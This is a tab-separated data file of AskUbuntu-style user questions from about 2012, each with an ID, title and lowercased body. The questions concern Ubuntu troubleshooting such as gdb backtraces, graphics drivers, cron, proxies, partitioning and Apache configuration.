110411	how can i run hp-systray from gdb ?	i would like to be able to run hp-systray from gdb to get a stacktrace and help fix a very annoying bug that 's been around for a while now . however , if i try to run gdb hp-systray 2 > & 1 | tee ~/gdb-hp-systray.txt as per the ubuntu wiki 's article on getting a backtrace , i get the following output : gnu gdb ( ubuntu/linaro 7.4-0ubuntu1 ) 7.4 copyright ( c ) 2012 free software foundation , inc. license gplv3+ : gnu gpl version 3 or later < http : //gnu.org/licenses/gpl.html > this is free software : you are free to change and redistribute it . there is no warranty , to the extent permitted by law . type `` show copying '' and `` show warranty '' for details . this gdb was configured as `` x86_64-linux-gnu '' . for bug reporting instructions , please see : < http : //www.gnu.org/software/gdb/bugs/ > ... '' /usr/bin/hp-systray '' : not in executable format : file format not recognized furthermore , using gdb 's run command returns the following : ( gdb ) run starting program : no executable file specified . use the `` file '' or `` exec-file '' command . running hp-systray on its own in the terminal works as expected , so how can i get it to run from gdb ?
110414	if i want to control the mouse cursor using python , should i look into docs for gnome or x ?	i want to write a program in python runs on ubuntu and moves the mouse cursor , just like a hardware mouse would . what should i try to connect to : x or gnome ? i am pretty sure that x would work , but i have heard that it is very low-level and difficult to use . is there some sort of gnome api for this sort of thing , or would i have to build my own version of gnome with some added changes ? would it just be easier to emulate a mouse ? are any of these things possible ?
110415	switching to workspaces view shows buggy blue background	when switching to workspaces view everything the background turns blue . same happens when i switch between multiple windows of the same app too . happening after having a try with gnome shell out of curiosity . installed through official repos like normal . tried it out but switched back , anyone have an idea of why this is happening ? got an intel gpu and unity 3d . if anyone can give me some direction , thanks a lot . update : looks like during the switch somehow opengl was disabled . glxinfo returns : name of display : :0 xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . this is very distressing , all i wanted to do was try out gnome3 . does anyone have an idea on how i can get opengl back ? [ update ] ok i found out what happened . apparently it 's not that hard to accidentally install an nvidia driver . all i had to do was remove all the stuff that had nvidia in it and i got 3d back ! for anyone else , this is how i found out : check out xorg.0.log ` $ cat / var/log/xorg.0.log | more` if you see a line like this somewhere ` ( ee ) failed to initialize glx extension ( compatible nvidia x driver not found ) ` you got an nvidia problem thanks everyone for trying to help : d
110423	java command not found	follow the instruction to setup java on ubuntu 11.10 from how do i install java ? . running following command to install : sudo apt-get install openjdk-6-jdk after it succeeded and i typed `` java '' , it prompts me with this error : the program 'java ' can be found in the following packages : * gcj-4.4-jre-headless * gcj-4.6-jre-headless * openjdk-6-jre-headless * gcj-4.5-jre-headless * openjdk-7-jre-headless
110425	removing ubuntu from a dual-boot setup with windows	i have installed ubuntu as another os on my laptop , and my default os is windows 7 . i just want to know how to remove ( or uninstall ) ubuntu without harming the other os . ps : ubuntu and windows 7 are both installed on one drive .
110428	backup lost but still taking space	i was reinstalling ubuntu yesterday . while doing so i was looking through my backup copy and accidentally pressed `` delete '' on one of the folders in the archive.. the computer worked a few hours and then returned error message : file does not exist . when i looked in the drive , my files were gone ! the tricky part of the whole thing is this though : even though i ca n't see the file , it 's still taking up space on my external drive , according to gparted . any idea how to save my data ?
110435	ubuntu 11.10 crash - wireless	i have ubuntu 11.10 and my system crashes after about 10 minutes . i think it is something to do with my wifi . i have intel centrino 6250 agn + wimax wireless chipset . i get the following error on the screen : error sending power_table_cmd : time out after 500ms and a big list of other status messages together with it . i do n't know how to gather the messages printed on the screen when the computer crashes . i am new to ubuntu and not very familiar with the terminal commands . any help would be much appreciated . thanks harish
110441	presenting power point slides in dual screen mode	i have ubuntu 11.10 and wine 1.3 1.3.28 . i use my laptop for commercial presentations and it is common to attach it to a projector . i would like to use a presentation mode in power point where in one screen ( the projector ) the slides are shown , and in the laptop screen beside the slide itself , there are other boxes such as time , notes , and next slides to come . but in order to activate this mode , powerpoint must be aware of the presence of 2 screens , which is not happening . does anyone know how to overcome this ? thanks !
110446	after closing and reopening laptop ubuntu has blank screen with some text	whenever i close my laptop and reopen it i am greeted with a black screen with the text : starting configure network device security stopping save kernel message starting bluetooth pulseaudio configured for per-user session saned disabled : edit /etc/default/saned and i ca n't do anything to get back into the os . i press every key and move my mouse but nothing . anybody have any idea what 's going on here ? thanks . edit : my hardware is like this : asus a54h processor type : intel core i3-2350m processor speed : 2.3ghz display : 15.6 '' led hd ( 1366 x 768 ) memory : 4gb ddr3-1333 hdd : 320gb odd : dvd burner connectivity : 802.11 b/g/n 10/100/1000 graphics : intel hd 3000 also , i just installed ubuntu recently and it has happened since i installed it .
110447	evolution 3.2 not deleting duplicate email account	after upgrading ubuntu 11.04 to 11.10 i found duplicate mail accounts in the evolution listing . i removed the unwanted ones , both unsubscribing and deleting them for preferences/account . i also wiped out completely the ./local/share/evolution/mail folder . apparently they seem gone . however , the problem is that every time evolution is restarted the duplicate account show up again and i have to repeat the cancellation procedure . in particular the problem is manifest with only one of my two gmail accounts ( the one which is the default mail account ) what 's the cause of this behaviour ? did anyone experience similar issues ? i 'll take the wiping out of the ./local/share/evolution folder as a last option , since i 'd like not to lose all my email accounts configurations .
110450	how to download source files for ubuntu 11.10	i am new to ubuntu , and recently installed ubuntu 11.10 64 bit version . i want to know the steps to download the source files for 11.10 to my laptop . tried sudo apt-get but failed to download .
110457	why is there a copy of user home dir showing up in root ?	i noticed today there is a directory called '~amir` in / . this seems really odd . the same directory is in my /home directory as amir is my username . they directories contain exactly the same data ! does anyone know how/why this happened and how i remove the one in root ? executing 'rm ~amir '' will remove my home folder wo n't it ? here is the output from ls with the offending item being the first directory shown : root @ supermassive : / # ls -al total 96 drwxr-xr-x 25 root root 4096 2012-03-06 03:00 . drwxr-xr-x 25 root root 4096 2012-03-06 03:00 .. drwxr-xr-t 3 root root 4096 2012-03-02 02:10 ~amir drwxr-xr-x 2 root root 4096 2012-02-27 06:51 bin drwxr-xr-x 3 root root 4096 2012-02-27 06:52 boot drwxr-xr-x 17 root root 4440 2012-03-06 08:33 dev drwxr-xr-x 101 root root 4096 2012-03-06 08:33 etc drwxr-xr-x 4 root root 4096 2012-03-06 09:04 home and here is the output to mount as requested : root @ supermassive : / # mount /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/md0 on /massivedata type ext4 ( rw ) rpc_pipefs on /var/lib/nfs/rpc_pipefs type rpc_pipefs ( rw ) nfsd on /proc/fs/nfsd type nfsd ( rw )
110461	11.10 server does not reconnect to network after router reboot ( dhcp or static ip )	if i reboot the router ( netgear dgn2200 ) my ubuntu 11.10 server box does not reconnect to the network . this is over a wired link either with a reserved ip address over dhcp or a static ip address configuration in /etc/network/interfaces as : # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 192.168.1.100 netmask 255.255.255.0 broadcast 192.168.1.255 network 192.168.1.0 gateway 192.168.1.1 both connection methods fail after a router reboot i.e . no ping , no ssh , no http . i have never had to do anything special to ensure reconnection before - but am i missing something ? thanks s
110463	how can i validate an installation dvd ?	i have downloaded an ubuntu iso and burned it to dvd . while installing from the dvd onto virtualbox i got an error which suggested either the hdd or dvd or overheating were the cause . i am investigating all three . how can i verify that the dvd has been correctly burned ( i still have the original iso file ) ?
110465	will they add the kernel 3.3 to ubuntu 12.04 ?	the kernel 3.3 is already getting close . will the ubuntu development team add it to their upcoming release ? that kernel fix the overheating issue of new laptops !
110468	utility for resizing partitions	is there a partition utility in ubuntu from which i can break my existing 'ext4 ' partition into more partition w/o loosing this partition 's data ?
110469	bar at the top of my ubuntu ? why is this here and how do i get rid of it ?	i dunno how to put this guys , but here 's a screenshot to basically show it . i 'm trying to use the zukwito theme on gnome 3 on ubuntu 11.10 , but there 's this bar thing ruining it . i checked cinnamon and it indeed is there as well . how do i get rid of this ugly piece of crap ? http : //i.imgur.com/nxe27.png you can see here this ugly panel thing is underneath the actual gnome panel and it ruins all transparent themes like zukwito . is there a fix ? : (
110474	how to move a machine from desktop to server ?	in order to make some tests i installed a couple of machines as ubuntu and kubuntu ( lucid aka 10.04 ) . now the configuration and the tests are completed and i would like to move both of them to ubuntu server without running the installation media . those machines are in production now ( blame on me ! ) and a re-installation is both impractical and impossible . i would expect i can do it by purging/removing a number of packages and by ( re ) installing another number of packages . thus keeping the machines online . i 've found this answer here , but it 's not actually saying anything useful to me . the help i need is : which packages i need to purge , remove and install ?
110477	how do i upgrade to a newer version of ubuntu ?	what are the different ways i can use to upgrade ubuntu from one release to another ?
110480	crontab command not run	i 'm trying to get execute a cron job everyday at noon but i ca n't get it to run . to test it i even tried something like a simple create command but it never runs , it seems as if the file is n't even used . i also ca n't see anything going wrong in the log . 0 12 * * * mkdir /path/to/folder so is there something wrong with this line or should i look elsewhere ? i created the crontab as root with crontab -e
110487	how do i configure dropbox to log to syslog ?	dropbox is currently running well on ubuntu server 10.04 . how can i setup dropbox to log any sync in syslog or even separate log file ?
110489	what version is recommended for atom based computer ?	i have samsung atom 1.66ghz and 2.00 gb ram . my hard disk is regular not an ssd , 5400rpm . do you think i can run a ubuntu 11.10 64bit ( as dual boot ) on it ?
110494	how does ubuntu support work	each ubuntu version have declared end of support date . for example current oneiric will be supported till april 2013 . what does that mean and what happens by that time ? if a bug is found in one of ubuntu supported packages - will it be fixed ? i 'm asking because i 'm experiencing serious known problems with compiz and unity which make it completly unusable for me ( bug # 888039 + few other minor ones ) . fixes have been released in precise branch although launchpad 's status says it affects oneiric ( it 's confusing too , but maybe i do n't know the process well enough ) . migrating to precise is not an option for now and i just wonder if i can expect such fixes to be backported to previous - still supported version if for some reason i would n't like to upgrade to latest version . i know it 's hard to generalize but just wanted to know what can i expect from `` supported '' version .
110495	unplug while lid closed does not result in standby	since upgrading to 11.10 from 10.10 ( fresh install ) my laptop ( thinkpad x60 ) no longer goes into standby if the power is removed after the lid has been closed . is there any way i can go about re-enabling this ? thank you josh
110497	cube desktop problem	i am using intel i3 480m , intel hd graphics , ubuntu 11.10 unity desktop laptop . i chose cube desktop and rotate cube using the ccsm . it works but the problem is that when i rotate to another screen , all windows of the previous screen flash into my screen and disappear . it is quite annoying to me . should i reinstall ccsm or should i do something else . thanks in advance .
110498	how to enable upnp coherence plugin in rhythmbox 2.95 ?	in ubuntu 10.10 i was using the rhythmbox-plugin-coherence package and i was happy to stream music from rhythmbox to our internet radio box . but in 11.10 ( 64bit ) i can not find the package anymore , although this page claims it is in the repositories ( as far as i understand ) . i first tried rhythmbox 2.95 which should have a grilo upnp , but was not successful . so installed the plugin according to this link with rhythmbox 2.95 : sudo apt-get install subversion sudo apt-get install python-coherence sudo svn checkout https : //coherence.beebits.net/svn/trunk/coherence/misc/rhythmbox-plugin/upnp_coherence/ /usr/lib/rhythmbox/plug ins/upnp_coherence and i also tried : svn checkout https : //coherence.beebits.net/svn/trunk/coherence/misc/rhythmbox-plugin/upnp_coherence/ /home/cds/.gnome2/rhythmbox/plugins/upnp_coherence but there is still no upnp plugin to activate in rhythmbox ( edit > plugins ) . did anybody manage to install this in ubuntu 11.10 or does this plugin not work anymore with the newer versions of rhythmbox ?
110504	is there an emacs for xubuntu ?	how can i install emacs on xubuntu , the command : sudo apt-get install emacs does n't work
110505	converting physical ubuntu 11.10 to vmware	we recently go an vmware esx server . no i tried , using the converter from vmware , to convert smaller physical servers to virtual servers . unfortunately , thats not easy . first , i got the problem that the converter does not suport grub2 , so i had to boot from the iso in order to fix the bootloader . afterwards , i could boot into grub , but grub told me he can not find the root-disk uuidxxxxxxxxxxxxxxx . i can see the problem ( uuid of hard drives have changed ) , but not the solution ( tried root=/dev/sda1 instead of root=uuidxxxxxxxxxxxxxx ) . does anyone have successfully converted a 11.10 to virtual , and if yes : how to i fix this problem , and how many other problems will i have to face afterwards ? thanks
110507	partitioning of ubuntu 10.04 server on kvm ?	i am installing ubuntu 10.04 server on a kvm virtual machine . the server will be used to install zimbra mail server , which installs under /opt/zimbra . as zimbra is being used , it needs more storage . i decided to put /opt on a separate partition , so that i can resize that partition later on if needed . i first did a test install with guided partition and ended up with a 254.8 mb for /boot and 1.5 gb for swap . so i think those are good numbers to use in my manual partition and i ended up with the following partition : scsi1 ( 0,0,0 ) ( sda ) - 34.4 gb ata qemu harddisk # 1 primary 254.8 mb f ext2 /boot # 5 logical 1.5 gb f swap swap # 6 logical 8.0 gb f ext4 / # 7 logical 24.6 gb f ext3 /opt /opt is set to ext3 , because zimbra installation requires a ext3 file system . my question is if this partition works well with a mail server . if not , any suggestions or advice ?
110510	how can i know how long `dd` cloning will take ?	i have to dd a couple of 1tb hard drives . they are taking several hours to clone and i was wondering if there was any way possible of knowing how fast they are going , how much they have done and how long will they take to copy the rest . all i can see is the terminal with the command running . when i run ps -e at least i know that dd is working from the cpu usage shown , but i have no way of knowing how much it has done or how long it will take to finish . kind of makes me crazy .
110511	how to set default encoding for non utf encoded documents system wide ?	the title says pretty much most of it - i have some windows txt files , and most of them are bulgarian with encoding windows-1251 . when i open them ( sublime , gedit , desktop generated icons ) the files are with windows-1252 ( western europe ) i can manually select the file encoding , but it get pretty much tiresome after some time . so , how to set default encoding for non utf encoded documents ?
110512	evince crashes for a specific pdf file	i 'm using fedora ( 64 bit ) , but i guess this might be relevant here too . if not , i 'd be happy if anyone could direct me the appropriate forum/bug reporting site . i have a pdf file that i created , compiling a few figures that i made in matlab . when i open it in okular/adobe/xpdf it works fine , but when i open it with evince the computer gets stuck and forces me to restart . even worse than that - whenever i open the contatining folder , the computer takes an outrageously long time to proceed , as the thumbnailer gets stuck . so i turned off the thumbnailer . any ideas as to how can i fix the file , fix evince , or do something ? the file is available here ( but i warn you guys , if you open it with evince - it 's your own responsibility ... )
110516	is there a way to install unity or gnome shell along with lubuntu ?	i 'm using lubuntu for a while now , but found a couple of details that i wanted to view with unity ( that 's another story ) . ok , the thing is : i 've tried on a vm with lubuntu to install unity ( sudo apt-get install unity ) when the installation is over . i selected in the lubuntu login unity/unity2d but did not work . right now i 'm installing ubuntu-desktop , i am presuming that will work , but also it will change my login for example . is there a way to do a `` clean '' installation of unity but not make major changes on my lubuntu ? i would prefer gnome-shell instead of unity .
110518	ca n't login to my server via ssh , and the password is correct	i 'm using linode , and i 've asked around on the irc channels , but no one seems to know . i 've logged into my server via lish ( reference ) , and i used the correct password , and everything went fine . however , i need to login via ssh/ftp , and i ca n't . it keeps on giving me `` permission denied '' . i know the password is correct because i reset it via lish , and i know i 've got the login method right because i 've logged into my server before using the exact same commands . i sure hope this does n't turn out to be some noob issue , or i 'm going to be quite frustrated .
110521	enable proxy settings at work , disable proxy settings at home ?	at work , i have a proxy set on many files/applications . in /apt/apt/apt.conf i have acquire : :http : :proxy `` http : //myproxy.example.com:8888 '' set . in /etc/wgetrc i have : https_proxy = myproxy.example.com:8888 http_proxy = myproxy.example.com:8888 ftp_proxy = myproxy.example.com:8888 use_proxy = on in /etc/environment i have : http_proxy= '' http : //myproxy.example.com:8888 '' https_proxy= '' https : //myproxy.example.com:8888 '' and in my network and proxy settings i have http , secure http , ftp proxies set up as well . so as you can see , i have proxies set up just about everywhere ! when i 'm at home though , this all becomes an annoyance , because i have the go into every file and comment out the proxy settings . do you know of an app/script to quick disable the proxy settings in all of these files and then quickly re-enable all of them ? furthermore , do i need to have all these proxy settings in all of these files , could i reduce them ?
110525	pnp4nagios error with apache	i had a working setup with pnp4nagios and nagios . everything was great . friday , i installed nagiosql . since then , pnp4nagios 's web ui does n't work anymore ! i get this error when trying to access it : the requested url /pnp4nagios/index.php/graph was not found on this server . mod_rewrite is enabled , but i guess the above error indicates that it 's not working correctly ? ? the links generated by nagios ( that used to work , before friday.. ) look like this : http : //srv-nagios/pnp4nagios/index.php/graph ? host=win-server & srv=ping here is the relevant output of apache 's error.log : [ fri mar 02 15:06:43 2012 ] [ error ] [ client 172.16.0.139 ] file does not exist : /usr/local/pnp4nagios/share/index.php/graph here is my /etc/apache2/conf.d/pnp4nagios.conf : alias /pnp4nagios `` /usr/local/pnp4nagios/share '' < directory `` /usr/local/pnp4nagios/share '' > allowoverride none order allow , deny allow from all # # use the same value as defined in nagios.conf # # authname `` nagios access '' # authtype basic # authuserfile /usr/local/nagios/etc/htpasswd.users require valid-user < ifmodule mod_rewrite.c > # turn on url rewriting rewriteengine on options followsymlinks # installation directory rewritebase /pnp4nagios/ # protect application and system files from being viewed rewriterule ^ ( application|modules|system ) - [ f , l ] # allow any files or directories that exist to be displayed directly rewritecond % { request_filename } ! -f rewritecond % { request_filename } ! -d # rewrite all other urls to index.php/url rewriterule . * index.php/ $ 0 [ pt , l ] < /ifmodule > < /directory > and my /etc/apache2/sites-available/default : < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /usr/local/nagios/share/vshell < directory / > options indexes followsymlinks allowoverride none allow from all authtype kerberos authname `` nagios authentification '' krbmethodnegotiate on krbmethodk5passwd on krbauthrealms 1234.com krb5keytab /etc/1234.keytab require user xxx @ 1234.com require user yyy @ 1234.com require user aaa @ 1234.com require user bbb @ 1234.com < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/local/nagios/sbin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > < /virtualhost > i 'm really lost here .
110532	how to use accelerators in gtk ?	i need to make an application in vala , using gtk , that supports keyboard accelerators that can be changed by the user . first , i add an entry to the global gtk.accelmap and then set the accel_path for the gtk.menuitems . but , it does n't work . the accels do n't appear in the items of the menubar . to clear what i 'm trying to do , here is a sample code : // main.vala public class mywindow : gtk.window { public mywindow ( ) { this.set_default_size ( 500 , 500 ) ; var main_box = new gtk.vbox ( false , 0 ) ; this.add ( main_box ) ; // menubar var menubar = new gtk.menubar ( ) ; main_box.pack_start ( menubar , false , false , 0 ) ; var file = new gtk.menuitem.with_label ( `` file '' ) ; menubar.add ( file ) ; var file_menu = new gtk.menu ( ) ; file.set_submenu ( file_menu ) ; var quit_mi = new gtk.menuitem.with_label ( `` quit '' ) ; file_menu.append ( quit_mi ) ; // register a new accelerator with the global accelerator map gtk.accelmap.add_entry ( `` < mywindow > /file/quit '' , 'q ' , gdk.modifiertype.control_mask ) ; quit_mi.set_accel_path ( `` < mywindow > /file/quit '' ) ; // connect signals quit_mi.activate.connect ( gtk.main_quit ) ; // label var label = new gtk.label ( `` my window '' ) ; main_box.pack_start ( label , true , true , 0 ) ; this.destroy.connect ( gtk.main_quit ) ; } } int main ( string [ ] args ) { gtk.init ( ref args ) ; var win = new mywindow ( ) ; win.show_all ( ) ; gtk.main ( ) ; return 0 ; } i use : valac main.vala -o main -- pkg gtk+-3.0 to compile the source code . so , the question is : what 's missing in the code ? i think i need to do something else , but i do n't know what .
110534	how can i use cygwin under ubuntu ?	i have written a tiny application for ubuntu , and it works great . i am interested in cross-compiling it for windows . i have installed mingw32 from repository , and it compiles simple files very well . however , the app i want to compile for windows uses some unix specific mechanism - for example it makes use of the sys/socket.h file , and the mingw compiler claims it ca n't find it . one solution is to install cygwin on a windows machine , and try compiling the application from there , using cygwin executables . unfortunately , i do n't have access to any windows machine , as i do n't own a copy that system . it would be perfect if i somehow could use cygwin ( with it 's libraries and headers ) on my ubuntu to compile an .exe file . there is no package with it in the repositories . can anyone give me some on how to use cygwin on ubuntu ?
110542	how do i remote desktop to linux ( ubuntu ) from windows ?	i see folks have asked how to remote desktop from ubuntu to windows , but not vice versa . how can i remote desktop from windows ( 7 ) to ubuntu ? if there 's no native support , what tools do i need to download and install .
110545	how do i fix up my partitions	i just bought a acer aspire laptop . i wanted to install ubuntu and dual boot with windows 7 . when i tried to do this , i accidentally deleted my windows partition altogether . i got the recover disks from acer , but when i tried to restore the partition , it told me it ran out of space . here 's my partition table . i would like recommendations . i obviously am not going to be cavalier at this point about deleting partitions , but i did clonezilla my drive off and i will again before doing anything too destructive . my thoughts are to create one big unallocated space outside the secondary partition , but i 'm not sure why the extended partition 's divided up as it is . all advice appreciated .
110549	how to disable luks partition from showing up in nautlus panel	i have a luks setup with encrypted partition . and i do n't want everyone on my computer to see that i have such partition . unfortunately it shows up in the nautilus `` devices '' panel as `` encrypted partition '' . is there a way to prevent it from showing there ? i plan to setup authentication with a keyfile on usb , but for now i can live without the gnome authentication dialog , and open and mount the partition from command line .
110551	t420 displayport	i 've got a thinkpad t420 . i want to know if it 's possible to get three displays running at once ( laptop + vga + displayport ) ? has anyone achieved this ? longer ramble follows : i 'm not concerned with power management . i 'm happy to use discret graphics in the bios , but after much messing about i 've not got optimus and bumblebee working otherwise , and when i try and reboot and switch to discrete graphics in the bios i just get a blank screen when i boot ( presumably as the nvidia drivers are n't installed ? ) . this post , http : //zachstechnotes.blogspot.com/2012/01/tri-head-display-on-linux-thinkpad-w520.html , claims that the 520 can only output to 2 of 3 displays at once , but says `` it seems that on the t420 and t520 , the integrated card is also connected to the vga output , but i have no way of verifying this '' . as an aside , i understand that displayport is n't a bumblebee feature just now , despite some claiming it works . i 've tried to follow the instructions here , https : //github.com/bumblebee-project/bumblebee/issues/77 and if i run optirun -d :8.0 glxspheres the standby light on my monitor lights up as if it 's about to come on , but then the glxspheres runs on the laptop display . if i try other settings for -d they call say `` could not open display '' . so there 's two different things here , either getting three outputs using the discrete card in the bios , or getting it to work with bumblebee . any ideas ? maybe i should just sit tight until bumblebee can do it . thanks !
110558	is it necessary to delete the recovery partition ?	i have windows 7 on my hp laptop and i want to install ubuntu . i tried to shrink my boot and system partition , it does not allow me to shrink the partition more than 97 mb . is it necessary to delete the recovery partition ? i want to know how to put this recovery on a cd or dvd to keep it and not to lose it .
110559	desktop widget to show list of tasks	in unity ubuntu 11.10 how i can have a screenlet with a list of tasks to do ? for example : 1- update system . 2- check mailbox . and so on . thanks in advance .
110562	ubuntu equivalent of portable executable file	i am developing an application which had some dependency and for that i use external tools . one example is that i use putty 's commandline tool plink.exe to telnet/ssh remote machine from java program . now when i switch to ubuntu , for that there is a utility sshpass that does the same for me . now the problem is sshpass is not already installed and before it is installed , my program will not work . in windows , if something is not there , i can package portable executable in my program e.g this plink.exe and use it at run time to do the job . now in ubuntu , i want to know is there any way that i package .exe like file , which i can simply call with arguments to perform similar tasks ? ? basically i want to know is there anyway in ubuntu to run a file without having to install it ? ? if so how is it possible ? ?
110565	why is git not using my pubkey with crontab ?	to backup my sql database i have a cron job running that makes a mysql dump . now i want to create another cron job that commits this dump to the repo , the problem now is that it does n't work . in the cron log i see the line where the command gets run but nothing is committed . shell=/bin/bash path=/sbin : /bin : /usr/sbin : /usr/bin : /usr/local/bin mailto=root home=/ 49 16 * * * cd /path/to/backup/folder/ & & /usr/local/bin/git commit -am `` updating db backup '' this is what i put in crontab -e. i also tried this in /etc/crontab , where i put root as user and that works but only as root user which is a problem because of the git post-commit hook that does push after something is commited . since only my user is allowed to push this does n't work when root doest the commit . since its working with the root user i 'm thinking it 's a permissions problem , but permissions of what ? these commands work in normal command line . when catching the stdout and stderr i get the following in the log . permission denied ( publickey ) .^m fatal : the remote end hung up unexpectedly so it does n't really runs as my user or ca n't find the key ?
110575	how to create a slideshow with effects from a list of web pages	is there a software application available to create a slideshow from a number of web pages that can be displayed in gnome desktop .
110580	how can i easily install missing hplip dependencies ?	having installed hplip on my 10.10 system , the hp photosmart 420 gives `` device communication error '' code 5012 when i try to print . running hp-check lists 11 missing dependencies . do i have to install them all one by one or is there an easier way to get the printer going ? what is the command to install a dependency ?
110584	bcm4313 wireless card keeps disconnecting	i am new to ubuntu and i have just installed ubuntu 11.10 . the problem is that the bcm4313 wireless card keeps disconnecting all the time . from the additional drivers window , i can see that the `` broadcom sta wireless driver '' is installed . i would appreciate any help at the moment as i am thinking to return back to windows . the output of `` lsmod | grep cfg80211 '' is cfg80211 199630 2 brcmsmac , mac80211
110591	recommendations for a taskbar/panel	what taskbars/panels are available in ubuntu ? what process should i follow to configure them ?
110594	can not install package `libxerces27-dev` when installing `phc` php compiler	to install phc following this guide in ubuntu oneiric 11.04 , i get error saying that the package is not available as below screenshot . searching for the package at ubuntu 's package search page result in no luck for me . please help !
110595	run a command does n't do anything	after i press alt + f2 the window for `` run a command comes up '' after that i specifically type in a command and then select or enter the command and nothing happens , it is suppose to ask me to type in my password and the window to open but absolutely nothing happens , please help me as this is the only way i can iron out the creases on linux and if this does n't work then nothing would work properly .
110599	how to change the default font for bless hex editor ?	bless seems slightly better to me then ghex , but it has this ugly default font i ca n't stand . my system monospaced font is set to droid sans mono , size 9 and bless uses courier new , size 12 . it 's too big and not preferred here , but ca n't find way to change it . do n't know if this is because it 's mono developed , do n't praise that either , but i searched in all folders where bless is `` unpacked '' : /usr/lib/bless /usr/share/bless and then : ~/.config/bless there is no file where font is defined .
110601	how do i install ubuntu on an imac running os x lion on a ssd and windows 7 on a hdd ?	how do i install ubuntu on an imac running os x lion on a ssd and windows 7 on a hdd ? i once successfully triple booted when i ran snow leopard , windows 7 , and ubuntu . now how can it be done with my more complicated and less forgiving lion set up ?
110602	drivers to screen , audio , keyboard/mouse	i am new to ubuntu , and i am about to replace windows 7 with ubuntu 11.10 . i know how to install the operating system from a cd . but when i have done that , do i need to install any drivers ? for screen , sound , keybord/mouse , internet etc ? computer specs : hp-pavilion kx664aa-uuw m9354.sc graphics card : nvidia geforce 9500 gt , processor : amd phenom ( tm ) 8450 triple-core processor . i do not know if these specs are necessary for you , but i put them on anyways i 'm not that good at computers , so it would be fine with an answer that was explained easily . looking forward to start using ubuntu instead of windows .
110605	compiz not staying in kubuntu 11.10	i installed kubuntu 11.10 on my computer that already runs unity . i want to use compiz so i can get the magic lamp effect and i already have kde compatibility checked in it but when i go into terminal and type `` compiz -- replace '' it will give me the effect i want but it will also change the window decoration to unity 's ambiance and i ca n't seem to change it . when i log out and log back in , comppiz is gone and i 'm back to how i was before . any ideas as to what 's going on and possible resolutions ?
110608	how to pass flags when starting 'service ' ?	i use commands like sudo service memcached start to turn on various things after a reboot and i am wondering if it is possible to also tell this service to start memcached to start with certain flags , for example -vvv ? any ideas ? ( the 'service ' was automatically created when i installed through apt-get )
110610	download files from git + gui	this post is related to downloading files from git repository on ubuntu 11.10 . i have installed 'git ' from software centre including the components like gui , revision tree visualiser etc etc the files i am downloading are from the following repo from terminal i can clone the repository by issuing following command khurram @ cp : ~/gitrepos $ git clone https : //github.com/commonsguy/cwac-wakeful.git so this repository has a jar file in downloads section of the git . but the above command does n't download those file so i have to do that manually . how can i download the said jar file or any other file for that matter automatically . can some one share a script to check for updates on git repository to download files . how can i invoke the gui component of my git installation . does linux have something like tortoise svn . i have used tortoise svn for subversion in windows and it integrates to the explorer . it shows a little red marker on the folder to indicate that it is out-of-sync . hence i can just right click on the folder to update from repository .
110612	scripting language that sends gui events to any gui app	i would like to run scripts that will allow me to interact with the gui by sending windows events such as : button presses text insertion window closing , minimizing utilize an apps quick key combinations etc . is there something out there for ubuntu that does this ?
110618	how to run flash inside tor browser with ubuntu 11.10	i am full-warned about the security issues . my question is not about that , please do n't answer about it . i have to browse some website using tor with flash enabled , but tor browser kit came with flash disabled by default . can someone point me how to install and run flash web sites inside tor browser bundle ? any solution for same problem with windows 7 is full aprecciated too , btw . many thanks .
110627	how to transfer my favorites from windows	i keep asking how to transfer my favourites from windows to ubuntu bookmarks and no-one seems to be able to tell me in simple language . videos in web pages do n't play it 's just a black space . how can i boot ubuntu as my default page without losing the option to go to windows .
110634	black screen logging into ubuntu 11.04	i 've had ubuntu downloaded on my dell computer for about year and it 's been working perfectly . but today when i tried to log on to my computer , it made choose from a list of settings on which type of linux i should select . i chose the first option and hit enter and then i got the black screen of death with this : _ blinking at the top of my screen and my caps lock key and my scroll lock keys were blinking . i 've tried this a few times and i still get the same result . i need help !
110638	window manager and login screen removed after trying and uninstalling gnome shell	a while back i decided to try the gnome shell desktop environment as i 've always been a fan of the foundation and the desktop environment . i decided that i 'd become used to unity and that i would n't really log into a gnome session often , so i uninstalled it via the command line ... which , frankly , was stupid . when i boot into my ubuntu installation , the login screen does not appear , but rather a logging tty - the one seen upon shutdown that is reserved for x11 , and normally accessible by ctrl+alt+f7 . can anyone tell me the packages required to make the login screen appear - as in default packages that may have been removed ( metacity , unity , etc ) ? edit : i ran apt-get update/upgrade/dist-upgrade from another terminal , but to no avail . here is a picture of the tty , just in case i was not clear ( sorry about the quality ) : thanks in advance .
